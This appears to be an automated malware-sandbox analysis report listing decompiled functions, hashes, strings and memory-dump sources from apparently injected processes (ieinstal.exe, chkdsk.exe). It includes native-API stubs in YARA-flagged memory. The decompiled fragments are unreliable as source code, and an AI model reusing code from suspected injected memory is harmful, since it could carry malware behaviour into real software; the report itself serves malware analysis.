Opcode Fuzzy Hash: 513687aa21b846cff64a5fd536143f607104553636ce289f36830943f32f5e03
Instruction Fuzzy Hash: 2B9002A1205180938B10E3588504B0E554547E0201B91C41AF1044920CC535CA52A135

Uniqueness

Uniqueness Score: -1.00%

Function 1F0038D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d6d74d0990f2ca5ab0d376cb18ff070330a9a1951161c5bc6925955fe77d890
Instruction ID: a835ce6838125341b6e2e7d210f10ca54b7834862efbb265ce4a346233725aad
Opcode Fuzzy Hash: 3d6d74d0990f2ca5ab0d376cb18ff070330a9a1951161c5bc6925955fe77d890
Instruction Fuzzy Hash: 3490022124909103D760F25C450461A504567E0201F91C425B0804954DC565CA567221

Uniqueness

Uniqueness Score: -1.00%

Function 1F004570 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4fd4d51261838f26a99cd4a6517114ed55cdd4605a3bdb4659bc03025b56098
Instruction ID: 4b67440d73dbf2f121a589baaac2857a7af13471fdab84804d0fa3a8e71f72fe
Opcode Fuzzy Hash: c4fd4d51261838f26a99cd4a6517114ed55cdd4605a3bdb4659bc03025b56098
Instruction Fuzzy Hash: 75900261605140438750F258490440A704557E13013D1C519B0544920CC628CA56A269

Uniqueness

Uniqueness Score: -1.00%

Function 1F0034E0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb5c55510703b957dddf3ae96b498a58d304c4773a17d3f4d55faf5c5d48adf
Instruction ID: 5c3e7d46003420073af9deb1dc89525d55411cd4b6bd6f6e503c1193f0134666
Opcode Fuzzy Hash: 7cb5c55510703b957dddf3ae96b498a58d304c4773a17d3f4d55faf5c5d48adf
Instruction Fuzzy Hash: F290023160914403D710E258461470A204547D0201FA1C815B0414928DC7A5CB5275A2

Uniqueness

Uniqueness Score: -1.00%

Function 1F004260 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02c8c5848ef23fe7eaf8a929ca89b589e45e9e3288beac8bdcd30a14c7ccc738
Instruction ID: dd734829b95bec7d2d2d3138970e8f1847cb34f762ba823c8468dca13e56056b
Opcode Fuzzy Hash: 02c8c5848ef23fe7eaf8a929ca89b589e45e9e3288beac8bdcd30a14c7ccc738
Instruction Fuzzy Hash: 3B90023160944013D750F258498454A504557E0301B91C415F0414914CCA24CB576361

Uniqueness

Uniqueness Score: -1.00%

Function 1F002B20 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 79b1847749693fd5eec2bd2016140ff4875b9e38af47acf0ad1980bcefad9bf7
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E1EFF7550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x1f0bb370 ^ _t107;
				_v8 =  *0x1f0bb370 ^ _t107;
				_t105 = __ecx;
				if( *0x1f0b6664 == 0) {
					L5:
					return E1F004B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E1EFCE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E1EFF7738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E1EFF763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E1F002B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E1EFF76ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E1F04EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E1F008F40( &_v548, 0, 0x214);
						_t106 =  *0x1f0b6664;
						_t110 = _t108 + 0x20;
						 *0x1f0b91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x1f0b6664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E1F004C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E1F04EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E1F00A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E1F04EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E1F00A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E1F04EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E1F03CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E1F04EF10();
						goto L15;
					}
					L8:
					_t56 = E1EFF7648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x1eff7560
0x1eff7562
0x1eff756f
0x1eff7571
0x1eff75ab
0x1eff75b9
0x1eff75b9
0x1eff7579
0x1eff7583
0x1eff758f
0x1f034443
0x1eff7595
0x1eff759e
0x1eff759e
0x1eff75a2
0x1eff75bc
0x1eff75c2
0x1eff75c7
0x1eff75c9
0x1eff7621
0x1eff7623
0x1eff7624
0x1eff75f8
0x1eff75ff
0x1eff7601
0x1eff762c
0x1eff7603
0x1eff7609
0x1eff7610
0x1eff7612
0x1eff7612
0x1eff7612
0x1eff7614
0x1eff7616
0x1eff7630
0x1eff7633
0x1eff7633
0x1eff7618
0x1eff761a
0x1f0345c9
0x1f0345c9
0x1f0345d1
0x1f0345d2
0x1f0345d4
0x1f0345d6
0x1f0345d6
0x00000000
0x1eff761a
0x1eff75ce
0x1eff75d4
0x1eff75da
0x1eff75df
0x1eff75e1
0x1f03444a
0x1f034450
0x00000000
0x00000000
0x1f034456
0x1f034469
0x1f034476
0x1f034486
0x1f03448b
0x1f034497
0x1f0344b9
0x1f0344bf
0x1f0344c1
0x1f0344c3
0x00000000
0x00000000
0x1f0344c9
0x1f0344cf
0x1f0344d1
0x00000000
0x00000000
0x1f0344dc
0x1f0344de
0x00000000
0x00000000
0x1f0344e6
0x1f0344ed
0x1f0344ef
0x1f0345c4
0x00000000
0x1f0345c4
0x1f0344f7
0x1f0344f8
0x1f034510
0x1f034515
0x1f034524
0x1f03452b
0x1f03452c
0x1f03452e
0x1f034556
0x1f034561
0x1f034567
0x1f034569
0x1f03456c
0x1f03456e
0x1f034574
0x1f034576
0x00000000
0x00000000
0x00000000
0x00000000
0x1f03457c
0x1f03457c
0x1f034584
0x1f034588
0x1f03458a
0x1f03458c
0x1f03458e
0x1f03458e
0x1f03459b
0x1f0345a0
0x1f0345a7
0x1f0345ac
0x1f0345ae
0x00000000
0x00000000
0x1f0345b4
0x1f0345b4
0x1f0345b7
0x1f0345b7
0x00000000
0x1f0345bf
0x1f034530
0x1f034535
0x1f034537
0x1f034539
0x00000000
0x1f03453e
0x1eff75e7
0x1eff75e9
0x1eff75ee
0x1eff75f0
0x00000000
0x00000000
0x1eff75f2
0x00000000
0x1eff75a4
0x1eff75a4
0x1eff75a4
0x00000000
0x1eff75a4

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1F034460
Execute=1, xrefs: 1F03451E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1F034507
CLIENT(ntdll): Processing section info %ws..., xrefs: 1F034592
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1F03454D
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1F034530
ExecuteOptions, xrefs: 1F0344AB

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 2fce4d945dbbc38d390d96b58090d660555a31fa8d0f2212deb3cf5e35df3095
Instruction ID: f47199a45ea0a0aaef6573d287917322baa2fc9c1e6f0629eb0e92f34b988d07
Opcode Fuzzy Hash: 2fce4d945dbbc38d390d96b58090d660555a31fa8d0f2212deb3cf5e35df3095
Instruction Fuzzy Hash: 62511C76A10219EAEF10DA95DCA4FE9B3A9AF08341F0506A9DD09E71D1E770EE41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1EFC9046(void* __ebx, signed char* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr* _t146;
				intOrPtr* _t148;
				signed char* _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x1f09be98);
				E1F017C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E1F008F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E1EFD9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x1f0b65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E1EFDA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E1EFE5A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E1EFE04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x1f0b65e0; // 0x75c8a680
							 *0x1f0b91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x1f0b65e8;
									if(_t148 != 0) {
										 *0x1f0b91e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E1EFDDC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E1EFD3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E1EFD9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E1F02247B();
									goto L26;
								} else {
									_t152 = E1EFDA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E1EFE04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x1efc9046
0x1efc9046
0x1efc904b
0x1efc9050
0x1efc9055
0x1efc905b
0x1efc905d
0x1efc9066
0x1efc906f
0x1efc9078
0x1efc9080
0x1efc9088
0x1efc908f
0x1efc9095
0x1efc90a9
0x1efc90b1
0x1efc90be
0x1efc90c6
0x1efc90cf
0x1efc90e2
0x1efc90f7
0x1efc90fb
0x1efc9118
0x00000000
0x1efc9123
0x1efc913b
0x1efc913f
0x00000000
0x00000000
0x1efc9147
0x1f02231f
0x1f02231f
0x00000000
0x1f02231f
0x1efc9154
0x1f022330
0x1f022336
0x1f022336
0x1efc915a
0x1efc915a
0x1efc915a
0x1efc9161
0x1efc9167
0x1efc916b
0x1efc9172
0x1efc9182
0x1efc918e
0x1efc9199
0x1efc91ba
0x1efc91be
0x00000000
0x1efc91e0
0x1f022358
0x1f022360
0x1f022368
0x1f02236a
0x1f022372
0x00000000
0x1f022378
0x1f022378
0x1f022381
0x1f022458
0x1f022458
0x1f02245b
0x1f022463
0x1f022468
0x1f02246e
0x1f02246e
0x1f0224a7
0x00000000
0x1f0224a7
0x1f02238f
0x1f022396
0x1f02239c
0x1f02239f
0x1f02239f
0x1f0223bb
0x1f0223c8
0x1f0223ca
0x1f0223d2
0x1f02244c
0x1f02244c
0x1f022453
0x00000000
0x1f0223d4
0x1f0223e7
0x1f0223e9
0x1f0223f1
0x00000000
0x00000000
0x1f0223f9
0x1f022402
0x1f022408
0x1f02240c
0x1f022413
0x1f022423
0x1f02243f
0x00000000
0x00000000
0x1f022441
0x1f022446
0x1f022446
0x00000000
0x1f022446
0x1f0223fb
0x00000000
0x1f0223fb
0x1f0223d2
0x00000000
0x1f022372
0x1efc91be
0x1efc9118
0x1efc90fd
0x1efc9102
0x1efc910e

Strings

@, xrefs: 1EFC9095
$, xrefs: 1EFC90B1

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 032f9ebf2d9fcc60538dc581e049f879e563494c33855f1c3d56c768d93aa71a
Instruction ID: 5f06bf0c2e5da510d8948c6988f0206773667b136978d25cec93907e60f993e1
Opcode Fuzzy Hash: 032f9ebf2d9fcc60538dc581e049f879e563494c33855f1c3d56c768d93aa71a
Instruction Fuzzy Hash: 6E813D75D002699BDB21CF94CC55BDEB7B8AF48710F1446DAE909B7280E771AE84CFA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chkdsk.exePID: 4556, Parent PID: 4828COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	0%
Total number of Nodes:	1339
Total number of Limit Nodes:	160

Executed Functions

Function 0071A350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00714BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00714BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0071A39D

Strings

.z`, xrefs: 0071A38D, 0071A398

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 3a46b925a91d592428fce92757707b19026f956d77ab593545e3fed8e2d31de0
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 24F0BDB2201208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0071A3FA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!Jq,FFFFFFFF,?,bMq,?,00000000), ref: 0071A445

Strings

!Jq, xrefs: 0071A41C, 0071A428

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !Jq
API String ID: 2738559852-3948549088
Opcode ID: 41410ea734f7490a16153160d8c0235673452366bcddec6ecab870ac3336ba72
Instruction ID: baf0cceebcc8345d3837c628bfa119f9d4bfa3f15f9adcf0865221bee8bfcaa0
Opcode Fuzzy Hash: 41410ea734f7490a16153160d8c0235673452366bcddec6ecab870ac3336ba72
Instruction Fuzzy Hash: CAF0E7B2200108AFCB14CF99CC80EEB77A9EF9D354F158258FA1DD7251D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0071A400 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!Jq,FFFFFFFF,?,bMq,?,00000000), ref: 0071A445

Strings

!Jq, xrefs: 0071A41C, 0071A428

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !Jq
API String ID: 2738559852-3948549088
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: dc73528c0136ca0800519cea09beb55466b9757427f225dcfd8eee4e3e5ce010
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 80F0A4B2200208AFCB14DF89DC85EEB77ADAF8C754F158248BA1D97241D630E9518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0071A47A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(@Mq,?,?,00714D40,00000000,FFFFFFFF), ref: 0071A4A5

Strings

@Mq, xrefs: 0071A49C, 0071A4A4

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: Close
String ID: @Mq
API String ID: 3535843008-3977126960
Opcode ID: 4e9380018427c795899e84853a118b487d0f4b3fc6694f8b224d0b7a32cbd04c
Instruction ID: 6b8d6ade5c46e824dd2ccbf3f80d70060515f063d31a9ba1a599f2950991b16f
Opcode Fuzzy Hash: 4e9380018427c795899e84853a118b487d0f4b3fc6694f8b224d0b7a32cbd04c
Instruction Fuzzy Hash: 64E08C71240114BFDB20DBA8CC86FDB7B28EF44360F114059B91DAB242C631EA108AA0

Uniqueness

Uniqueness Score: -1.00%

Function 0071A480 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(@Mq,?,?,00714D40,00000000,FFFFFFFF), ref: 0071A4A5

Strings

@Mq, xrefs: 0071A49C, 0071A4A4

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: Close
String ID: @Mq
API String ID: 3535843008-3977126960
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: f47bca916702a2849ae53153c240004b5f0b317fb53b8b22aee653e4784fd6bd
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: D1D01776200214BBDB10EB98CC89EE77BACEF48760F154499BA1C9B282C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 0071A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00702D11,00002000,00003000,00000004), ref: 0071A569

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 55b252ea4b1033f88cc90300a2ee8e0224e9f3c748de844442dc20c329b811ff
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 2FF015B2200208AFCB14DF89CC81EEB77ADAF88754F118148BE1C97241C630F911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0071A52A Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

